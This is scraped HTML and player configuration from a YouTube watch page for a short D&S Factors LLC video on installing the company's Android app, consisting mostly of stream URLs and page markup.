id="search-btn" tabindex="2" dir="ltr"><span class="yt-uix-button-content">Search </span></button><div id="masthead-search-terms" class="masthead-search-terms-border" dir="ltr"><label><input id="masthead-search-term" autocomplete="off" class="search-term yt-uix-form-input-bidi" name="search_query" value="" type="text" tabindex="1" title="Search"></label></div></form></div></div></div>
<div id="masthead-appbar-container" class="clearfix"><div id="masthead-appbar"><div id="appbar-content" class=""></div></div></div>
</div><div id="masthead-positioner-height-offset"></div><div id="page-container"><div id="page" class=" watch watch-non-stage-mode clearfix"><div id="guide" class="yt-scrollbar"> <div id="appbar-guide-menu" class="appbar-menu appbar-guide-menu-layout appbar-guide-clickable-ancestor">
<div id="guide-container">
<div class="guide-module-content guide-module-loading">
<p class="yt-spinner">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="Loading icon" class="yt-spinner-img">
<span class="yt-spinner-message">
Loading...
</span>
</p>
</div>
</div>
</div>
</div><div id="alerts" class="content-alignment">
</div><div id="header"></div><div id="player" class=" watch-small "><div id="theater-background"></div> <div id="player-mole-container">
<div id="player-unavailable" class=" hid player-width player-height player-unavailable ">
<img class="icon meh" src="//s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" data-icon="//s.ytimg.com/yts/img/meh7-vflGevej7.png" alt="">
<div class="content">
<h1 id="unavailable-message" class="message">
This video is unavailable.
</h1>
<div id="unavailable-submessage" class="submessage">
</div>
</div>
</div>
<div id="player-api" class="player-width player-height off-screen-target player-api"></div>
<script>if (window.ytcsi) {window.ytcsi.tick("cfg", null, '');}</script>
<script>var ytplayer = ytplayer || {};ytplayer.config = {"assets": {"html": "\/html5_player_template", "js": "\/\/s.ytimg.com\/yts\/jsbin\/html5player-en_US-vflxrHvBh.js", "css": "\/\/s.ytimg.com\/yts\/cssbin\/www-player-webp-vfl3tXgxf.css"}, "html5": true, "args": {"c": "WEB", "eventid": "gHmgU6rPMMah-AOzuIDwAg", "cosver": "6.1", "vq": "auto", "cos": "Windows", "adaptive_fmts": "init=0-710\u0026index=711-1210\u0026itag=137\u0026lmt=1402942211613551\u0026clen=45694603\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.640028%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D137%26mt%3D1403025756%26clen%3D45694603%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3D838A4E34C95975D97D1DDB3707D0848B4FEADB43.5E8E70EED0C8683ECD339B5E60D138565F58B8D9%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942211613551\u0026size=1920x1080\u0026bitrate=2536968,init=0-708\u0026index=709-1208\u0026itag=136\u0026lmt=1402942191318153\u0026clen=22970966\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.4d401f%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D136%26mt%3D1403025756%26clen%3D22970966%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3DD39FCFA2FC8BE3ADDFADFC6A0257CFC9999CE694.686634B7E47632FB1028591D6A2A18D51C12E4BD%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942191318153\u0026size=1280x720\u0026bitrate=1331398,init=0-708\u0026index=709-1208\u0026itag=135\u0026lmt=1402942188591707\u0026clen=11786651\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.4d401f%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D135%26mt%3D1403025756%26clen%3D11786651%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3DC786B3BF393CDA3D6915676F1FD4D1247F5FF3F5.DEB8D4E17104CF5F99D470CBD2D45FD692110398%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942188591707\u0026size=854x480\u0026bitrate=661420,init=0-708\u0026index=709-1208\u0026itag=134\u0026lmt=1402942185951833\u0026clen=5977551\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.4d401e%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D134%26mt%3D1403025756%26clen%3D5977551%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3D1ACFDB240EF93004E1649BBED30AFFBA56DDF5BD.111656AF6269901E4E0893EE7605A925C1792AF8%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942185951833\u0026size=640x360\u0026bitrate=306293,init=0-672\u0026index=673-1172\u0026itag=133\u0026lmt=1402942188790806\u0026clen=5954985\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.4d4015%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D133%26mt%3D1403025756%26clen%3D5954985%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3D91773252B16411B6572C1417DC6E7DDD64A5A11F.D38696712A79A91448F7E0197A4BE5C089928EBC%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942188790806\u0026size=426x240\u0026bitrate=249448,init=0-670\u0026index=671-1170\u0026itag=160\u0026lmt=1402942181651512\u0026clen=2554980\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.42c00c%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D160%26mt%3D1403025756%26clen%3D2554980%26dur%3D194.594%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3DD87D3273D8DF0449A2222F746A117E695C6C8954.6B2912EF8B3724E47425198AB245B639BFA7F492%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942181651512\u0026size=256x144\u0026bitrate=107202,init=0-591\u0026index=592-863\u0026itag=140\u0026lmt=1402942183250714\u0026clen=3126042\u0026type=audio%2Fmp4%3B+codecs%3D%22mp4a.40.2%22\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D140%26mt%3D1403025756%26clen%3D3126042%26dur%3D194.652%26ipbits%3D0%26ms%3Dau%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Dclen%252Cdur%252Cgir%252Cid%252Cip%252Cipbits%252Citag%252Clmt%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3DK5C43xudJ0c%26key%3Dyt5%26gir%3Dyes%26requiressl%3Dyes%26signature%3D3A03563FF55BC825F19AB5DDDC53FDD8A7D91331.30BBBFD4B135A405757D6A2762C8C5DF94A10A76%26ip%3D24.119.144.139%26mws%3Dyes%26lmt%3D1402942183250714\u0026bitrate=129584", "ucid": "UCMWF7NAPUh9bHQdKABkt4Rw", "url_encoded_fmt_stream_map": "fallback_host=tc.v8.cache7.googlevideo.com\u0026quality=hd720\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26ratebypass%3Dyes%26itag%3D22%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Cratebypass%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3D093F9114E1937EA276334E099AD54D1BF6B9945E.22E78944D6CE530039B042D918592FA834C33E4F%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=22\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.64001F%2C+mp4a.40.2%22,fallback_host=tc.v6.cache5.googlevideo.com\u0026quality=medium\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26ratebypass%3Dyes%26itag%3D43%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Cratebypass%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3D467C74AA4A82D1542F5CD58CE670BB7DFD35ED2B.9BAE0FC17F8E63BA737DA5CCBB88C32394C201D2%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=43\u0026type=video%2Fwebm%3B+codecs%3D%22vp8.0%2C+vorbis%22,fallback_host=tc.v19.cache5.googlevideo.com\u0026quality=medium\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26ratebypass%3Dyes%26itag%3D18%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Cratebypass%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3D2303417551F2564334A49F292CE405BF91D684A2.39E8049EE7B2214272D776F804952E89FD74DB37%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=18\u0026type=video%2Fmp4%3B+codecs%3D%22avc1.42001E%2C+mp4a.40.2%22,fallback_host=tc.v22.cache8.googlevideo.com\u0026quality=small\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D5%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3D35D6396E95612E814A99C0DCC56A246799CC9A0A.EA4E44A64A18AE707BCE884AEEE50D3136D3B984%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=5\u0026type=video%2Fx-flv,fallback_host=tc.v13.cache6.googlevideo.com\u0026quality=small\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D36%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3D4154462AC5ABEEE7159FFDB0133B9D0817658D25.26B2F552BB64BE712F88FA9293D2E4CCF0831219%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=36\u0026type=video%2F3gpp%3B+codecs%3D%22mp4v.20.3%2C+mp4a.40.2%22,fallback_host=tc.v19.cache2.googlevideo.com\u0026quality=small\u0026url=https%3A%2F%2Fr1---sn-j5caxvox-45ge.googlevideo.com%2Fvideoplayback%3Fexpire%3D1403051184%26fexp%3D3300009%252C3300115%252C3300133%252C3300137%252C3300161%252C3310366%252C3310648%252C3310701%252C3312164%252C3312169%252C900356%252C930008%252C934026%252C939937%26itag%3D17%26mt%3D1403025756%26ipbits%3D0%26sver%3D3%26id%3Do-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB%26mv%3Dm%26sparams%3Did%252Cip%252Cipbits%252Citag%252Crequiressl%252Csource%252Cupn%252Cexpire%26source%3Dyoutube%26upn%3Dyxk54sIWjn4%26key%3Dyt5%26requiressl%3Dyes%26signature%3DDF0A33358A5F9849780358A56804D4EEAB7605F0.A8C54B281D08A7696566A2446B3A723FC407B781%26ip%3D24.119.144.139%26mws%3Dyes%26ms%3Dau\u0026itag=17\u0026type=video%2F3gpp%3B+codecs%3D%22mp4v.20.3%2C+mp4a.40.2%22", "t": "vjVQa1PpcFOgNBKJFloPMol09Pn4ZfyR8eAFOlWVXpw=", "video_id": "EisQGYxhI1U", "ldpj": "0", "fmt_list": "22\/1280x720\/9\/0\/115,43\/640x360\/99\/0\/0,18\/640x360\/9\/0\/115,5\/320x240\/7\/0\/0,36\/320x240\/99\/1\/0,17\/176x144\/99\/1\/0", "idpj": "0", "dash": "1", "cr": "US", "keywords": "", "loaderUrl": "https:\/\/www.youtube.com\/watch?v=EisQGYxhI1U", "length_seconds": 195, "ssl": 1, "title": "DS Factors Android v3 1", "hl": "en_US", "atc": "a=3\u0026b=zqgyCG3e1Mxys_AYz2k8Zfc87DY\u0026c=1403025792\u0026d=1\u0026e=EisQGYxhI1U\u0026c3a=15\u0026c1a=1\u0026hh=dsqadhkPttFJ7WJRA4O9SomVwsU", "host_language": "en", "account_playback_token": "QUFFLUhqbndNNUthX1FoUllSbV9JandiZVRCNzVsS3lhd3xBQ3Jtc0tsb29RN2VJX19JYVhuNTJVblVzWHhaWTcycVNjZDlGaUFRZnB6SWY2aHY5REdiOGlQZVFwZ0hsUkZwNzlwY0M0MFd1VUlhZF9LUnpRdG9vV0s5Y2tCZHkybWw4NTN6RHdMeTlpVmJsVG01bTBtendaYw==", "rvs": "session_data=feature%3Dendscreen\u0026author=ziggieization\u0026title=Peterborough+Court+House++No+Consent%2C+No+Jurisdiction%2C+I+Am+Not+That+LEGAL+FICTION+.wmv\u0026id=tdepiq9dzSw\u0026length_seconds=227,session_data=feature%3Dendscreen\u0026author=Kitty+Washington\u0026title=Fast+And+Furious+6+Hacks+And+Cheats+--+%5B100%25+Working+-+Updated+Version+-+Get+It+Here%21%5D\u0026id=vG1EaStcrs0\u0026length_seconds=169,session_data=feature%3Dendscreen\u0026author=VideoLogDotCom\u0026title=Where+is+the+Browse+button%3F+%28New+YouTube+Layout+12%2F6%2F12%29\u0026id=34Bwt7QGkZQ\u0026length_seconds=145,session_data=feature%3Dendscreen\u0026author=MyWorldPhone+Brian\u0026title=Samsung+Galaxy+Y+Duos+S6102+Dual\u0026id=lO4QUmTHo1U\u0026length_seconds=290,session_data=feature%3Dendscreen\u0026author=wekerss\u0026title=DSO203+Digital+Oscilloscope+Portable++72msps+4+Channel\u0026id=HKRLoELTP0A\u0026length_seconds=104,session_data=feature%3Dendscreen\u0026author=cierny\u0026title=Faulty+Android+Box+Stick+MK802%2B\u0026id=RlF1Dc7WA4M\u0026length_seconds=272,session_data=feature%3Dendscreen\u0026author=Thawatchai+Srilardlao\u0026title=ChipKIT+Max32\u0026id=aDbpKy6JU8U\u0026length_seconds=58,session_data=feature%3Dendscreen\u0026author=TH3+TechNews\u0026title=The+Crew+2014+Ubisoft\u0026id=G2qeNeEqITU\u0026length_seconds=187,session_data=feature%3Dendscreen\u0026author=Mel+Hoad\u0026title=Battle+Run+S2+Hack+Cheat+-+%5BLatest+Working+Version+2014+-+100%25+Success+Rate%5D\u0026id=I4UisitO-n8\u0026length_seconds=94,session_data=feature%3Dendscreen\u0026author=GAMING\u0026title=BEST+PARK+IN+THE+UNIVERSE+CHEATS+APK+DOWNLOAD\u0026id=OpLiv8sk6mc\u0026length_seconds=248,session_data=feature%3Dendscreen\u0026author=Damien+Donnelly\u0026title=AMZ+ShopperMagnet+Review\u0026id=H3oD334udPM\u0026length_seconds=119,session_data=feature%3Dendscreen\u0026author=PeteneraDanceDrama\u0026title=Petenera+Dance+Drama+--+the+Trailer\u0026id=GsJhXYYcm3s\u0026length_seconds=231", "watermark": ",https:\/\/s.ytimg.com\/yts\/img\/watermark\/youtube_watermark-vflHX6b6E.png,https:\/\/s.ytimg.com\/yts\/img\/watermark\/youtube_hd_watermark-vflAzLcD6.png", "dashmpd": "https:\/\/manifest.googlevideo.com\/api\/manifest\/dash\/expire\/1403051184\/as\/fmp4_audio_clear%2Cwebm_audio_clear%2Cfmp4_sd_hd_clear%2Cwebm_sd_hd_clear\/itag\/0\/mt\/1403025756\/ipbits\/0\/ms\/au\/playback_host\/r1---sn-j5caxvox-45ge.googlevideo.com\/id\/o-AGU2FmkX6z-AuByWV0nw-Y1tDqdtkshwNfYMRcy0kvhB\/sver\/3\/mv\/m\/sparams\/as%2Ccmbypass%2Cid%2Cip%2Cipbits%2Citag%2Cplayback_host%2Crequiressl%2Csource%2Cexpire\/source\/youtube\/mws\/yes\/fexp\/3300009%2C3300115%2C3300133%2C3300137%2C3300161%2C3310366%2C3310648%2C3310701%2C3312164%2C3312169%2C900356%2C930008%2C934026%2C939937\/key\/yt5\/requiressl\/yes\/signature\/9D778D1D3F6C90FA03A51CD52548590D78243CBC.EAD246AFC05A34B38F166212D67BC6ABB9E01738\/ip\/24.119.144.139\/upn\/-22z3chPeOM\/cmbypass\/yes", "referrer": null, "sendtmp": "1", "fexp": "3300009,3300115,3300133,3300137,3300161,3310366,3310648,3310701,3312164,3312169,900356,930008,934026,939937", "pltype": "contentugc", "plid": "AAT8C2X9wc7Zfcb2", "enablecsi": "1", "storyboard_spec": "https:\/\/i1.ytimg.com\/sb\/EisQGYxhI1U\/storyboard3_L$L\/$N.jpg|48#27#100#10#10#0#default#lKLr1uv9AiP5ftaxsbT-YPMZR1s|80#45#99#10#10#2000#M$M#m-eABLES8ju4G-QUiSoZiLQiapE|160#90#99#5#5#2000#M$M#KcmzeSlYkAgId-Kb_8sRpe27zBA", "enablejsapi": 1, "cbrver": "35.0.1916.114", "timestamp": 1403025792, "ptk": "youtube_none", "csi_page_type": "watch,watch7_html5", "cbr": "Chrome"}, "url_v8": "https:\/\/s.ytimg.com\/yts\/swfbin\/player-vflNMXMGI\/cps.swf", "url": "https:\/\/s.ytimg.com\/yts\/swfbin\/player-vflNMXMGI\/watch_as3.swf", "sts": 16234, "attrs": {"id": "movie_player"}, "params": {"allowfullscreen": "true", "allowscriptaccess": "always", "bgcolor": "#000000"}, "min_version": "8.0.0", "url_v9as2": "https:\/\/s.ytimg.com\/yts\/swfbin\/player-vflNMXMGI\/cps.swf"};(function() {if (!!window.yt) {yt.player.Application.create("player-api", ytplayer.config);ytplayer.config.loaded = true;}}());</script>
</div>
<div class="clear"></div>
</div>
<div id="content" class=" content-alignment yt-card
"> <div id="watch7-container" class="">
<div id="watch7-main-container">
<div id="watch7-main" class="clearfix">
<div id="watch7-content" class="watch-content " itemscope itemid="" itemtype="http://schema.org/VideoObject"
>
<link itemprop="url" href="http://www.youtube.com/watch?v=EisQGYxhI1U">
<meta itemprop="name" content="DS Factors Android v3 1">
<meta itemprop="description" content="D&S Factors has gone mobile! This short video has step by step instructions to download & install the app on your android phone.">
<meta itemprop="paid" content="False">
<meta itemprop="channelId" content="UCMWF7NAPUh9bHQdKABkt4Rw">
<meta itemprop="videoId" content="EisQGYxhI1U">
<meta itemprop="duration" content="PT3M15S">
<meta itemprop="unlisted" content="False">
<span itemprop="author" itemscope itemtype="http://schema.org/Person">
<link itemprop="url" href="http://www.youtube.com/channel/UCMWF7NAPUh9bHQdKABkt4Rw">
</span>
<span itemprop="author" itemscope itemtype="http://schema.org/Person">
<link itemprop="url" href="https://plus.google.com/108341808351971593892">
</span>
<link itemprop="thumbnailUrl" href="https://i1.ytimg.com/vi/EisQGYxhI1U/maxresdefault.jpg">
<span itemprop="thumbnail" itemscope itemtype="http://schema.org/ImageObject">
<link itemprop="url" href="https://i1.ytimg.com/vi/EisQGYxhI1U/maxresdefault.jpg">
<meta itemprop="width" content="1280">
<meta itemprop="height" content="720">
</span>
<link itemprop="embedURL" href="https://www.youtube.com/embed/EisQGYxhI1U">
<meta itemprop="playerType" content="HTML5 Flash">
<meta itemprop="width" content="1280">
<meta itemprop="height" content="720">
<meta itemprop="isFamilyFriendly" content="True">
<meta itemprop="regionsAllowed" content="AD,AE,AF,AG,AI,AL,AM,AO,AQ,AR,AS,AT,AU,AW,AX,AZ,BA,BB,BD,BE,BF,BG,BH,BI,BJ,BL,BM,BN,BO,BQ,BR,BS,BT,BV,BW,BY,BZ,CA,CC,CD,CF,CG,CH,CI,CK,CL,CM,CN,CO,CR,CU,CV,CW,CX,CY,CZ,DE,DJ,DK,DM,DO,DZ,EC,EE,EG,EH,ER,ES,ET,FI,FJ,FK,FM,FO,FR,GA,GB,GD,GE,GF,GG,GH,GI,GL,GM,GN,GP,GQ,GR,GS,GT,GU,GW,GY,HK,HM,HN,HR,HT,HU,ID,IE,IL,IM,IN,IO,IQ,IR,IS,IT,JE,JM,JO,JP,KE,KG,KH,KI,KM,KN,KP,KR,KW,KY,KZ,LA,LB,LC,LI,LK,LR,LS,LT,LU,LV,LY,MA,MC,MD,ME,MF,MG,MH,MK,ML,MM,MN,MO,MP,MQ,MR,MS,MT,MU,MV,MW,MX,MY,MZ,NA,NC,NE,NF,NG,NI,NL,NO,NP,NR,NU,NZ,OM,PA,PE,PF,PG,PH,PK,PL,PM,PN,PR,PS,PT,PW,PY,QA,RE,RO,RS,RU,RW,SA,SB,SC,SD,SE,SG,SH,SI,SJ,SK,SL,SM,SN,SO,SR,SS,ST,SV,SX,SY,SZ,TC,TD,TF,TG,TH,TJ,TK,TL,TM,TN,TO,TR,TT,TV,TW,TZ,UA,UG,UM,US,UY,UZ,VA,VC,VE,VG,VI,VN,VU,WF,WS,YE,YT,ZA,ZM,ZW">
<div id="watch7-speedyg-area">
<div class="yt-alert yt-alert-actionable yt-alert-info hid " id="speedyg-template"> <div class="yt-alert-icon">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="icon master-sprite" alt="Alert icon">
</div>
<div class="yt-alert-buttons"> <a href="https://www.google.com/get/videoqualityreport/?v=EisQGYxhI1U" class="yt-uix-button yt-uix-sessionlink yt-uix-button-alert-info yt-uix-button-size-default" data-sessionlink="ei=gHmgU6rPMMah-AOzuIDwAg" id="speedyg-link" target="_blank"><span class="yt-uix-button-content">Find out why </span></a>
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-close close yt-uix-close" type="button" onclick=";return false;" data-close-parent-class="yt-alert"><span class="yt-uix-button-content">Close </span></button></div><div class="yt-alert-content" role="alert"> <span class="yt-alert-vertical-trick"></span>
<div class="yt-alert-message">
</div>
</div></div>
</div>
<div id="watch-header" class="">
<div id="watch7-headline" class="clearfix yt-uix-expander yt-uix-expander-collapsed">
<h1 id="watch-headline-title" class="yt">
<span id="eow-title" class="watch-title yt-uix-expander-head" dir="ltr" title="DS Factors Android v3 1">
DS Factors Android v3 1
</span>
</h1>
</div>
<div id="watch7-user-header" class=" spf-link "><a href="/channel/UCMWF7NAPUh9bHQdKABkt4Rw" class="yt-user-photo yt-uix-sessionlink" data-sessionlink="feature=watch&ei=gHmgU6rPMMah-AOzuIDwAg" > <span class="video-thumb yt-thumb yt-thumb-48 g-hovercard"
data-ytid="UCMWF7NAPUh9bHQdKABkt4Rw"
>
<span class="yt-thumb-square">
<span class="yt-thumb-clip">
<img alt="D&S Factors LLC" src="https://yt3.ggpht.com/-ROml5klGhow/AAAAAAAAAAI/AAAAAAAAAAA/hw1pZOa0jRg/s88-c-k-no/photo.jpg" width="48" height="48" >
<span class="vertical-align"></span>
</span>
</span>
</span>
</a><div class="yt-user-info"><a href="/channel/UCMWF7NAPUh9bHQdKABkt4Rw" class="g-hovercard yt-uix-sessionlink yt-user-name " data-sessionlink="feature=watch&ei=gHmgU6rPMMah-AOzuIDwAg" dir="ltr" data-ytid="UCMWF7NAPUh9bHQdKABkt4Rw" data-name="watch">D&S Factors LLC</a><span class="yt-user-separator">·</span><a class="yt-uix-sessionlink yt-user-videos" href="/channel/UCMWF7NAPUh9bHQdKABkt4Rw/videos" data-sessionlink="feature=watch&ei=gHmgU6rPMMah-AOzuIDwAg">3 videos</a></div><span id="watch7-subscription-container"><span class=" yt-uix-button-subscription-container with-preferences" ><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-subscribe-branded yt-uix-button-has-icon yt-uix-subscription-button yt-can-buffer" type="button" onclick=";return false;" aria-role="button" aria-live="polite" aria-busy="false" 